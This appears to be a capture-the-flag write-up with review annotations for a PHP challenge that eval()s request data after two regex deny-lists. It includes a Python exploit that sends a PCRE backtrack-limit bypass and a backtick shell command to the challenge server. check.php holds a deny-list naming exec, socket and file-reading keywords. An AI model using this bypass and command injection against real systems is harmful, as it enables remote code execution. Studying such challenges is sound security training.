<?php
// Challenge entry point: reads `letter` from the request, passes it through two
// deny-list regexes and, when both let it through, eval()s the decoded `cmd`.
// Comments below are review notes; the code itself is left exactly as found.
include "check.php";
if (isset($_REQUEST['letter'])){
// Untrusted request value ($_REQUEST typically merges GET, POST and cookies).
$txw4ever = $_REQUEST['letter'];
// First filter: applied to the whole raw string, not just the `cmd` member.
// NOTE(review): preg_match() returns false on a PCRE error (for example when
// the backtrack limit is hit), and a bare `if (...)` treats that false like
// "no match", so the else branch -- and eval() -- is still reached.
// Fail-closed form would be `if (preg_match(...) !== 0) { die(...); }`.
if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw4ever)){
die("再加把油喔");
}
else{
// json_decode() yields null on invalid JSON; indexing null with ['cmd'] then
// gives null plus a warning, which the `@` on eval() below does not cover.
$command = json_decode($txw4ever,true)['cmd'];
// Second filter (check.php): keyword/character deny-list on `cmd` alone.
checkdata($command);
// SECURITY: eval() of request-derived data is arbitrary code execution by
// design here; `@` additionally suppresses any warning eval() itself raises.
@eval($command);
}
}
else{
// No parameter given: serve this file's own source as the challenge hint.
highlight_file(__FILE__);
}
?>
先用 PCRE 绕过正则，然后 checkdata 里似乎过滤了不少东西，反引号（``）还是可以用，但 echo 没法用，用 PHP 的短标签 <?= 来代替。
import requests
# Request used in the writeup. The server JSON-decodes `letter` and eval()s
# its `cmd` member after two regex deny-lists (see the PHP above).
# `cmd` closes the PHP block and reopens it with the short echo tag `<?=`
# because `echo` itself is on check.php's deny-list; backticks are not.
# The second member is only padding: per the writeup, the very long value is
# the "PCRE bypass" of the first regex; the original author's comment was
# "seems it has to be a special character".
payload='{"cmd":"?><?= `ls`","test":"' + "@"*(1000000) + '"}'# seems it has to be a special character
res = requests.post("http://node4.anna.nssctf.cn:28794/", data={"letter":payload})
print(res.text)
然后 cat 和 tac 都用不了（check.php 里过滤了），用 strings、more 等命令代替。
check.php:
<?php
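/**
 * Second-stage deny-list filter applied to the decoded `cmd` value before the
 * including script eval()s it.
 *
 * Aborts the request with the challenge message when the case-insensitive
 * pattern finds any listed character or keyword in $data.
 *
 * Change from the original: preg_match() returns false on a PCRE error (for
 * example when the backtrack limit is exceeded), and a plain
 * `if (preg_match(...))` reads that false as "no match" and lets the value
 * through. The result is now compared against 0, so an engine error is
 * rejected exactly like a match (fail closed). The pattern is unchanged.
 *
 * @param mixed $data value to inspect (a string in normal use)
 * @return void
 */
function checkdata($data)
{
    // Pattern kept byte-for-byte; only its return value is handled differently.
    $verdict = preg_match("/\^|\||\~|assert|print|include|require|\(|echo|flag|data|php|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk|tcp|cat|tac/i", $data);

    // 1 = forbidden token found, false = PCRE error: both terminate here.
    if ($verdict !== 0) {
        die('差一点点捏');
    }
}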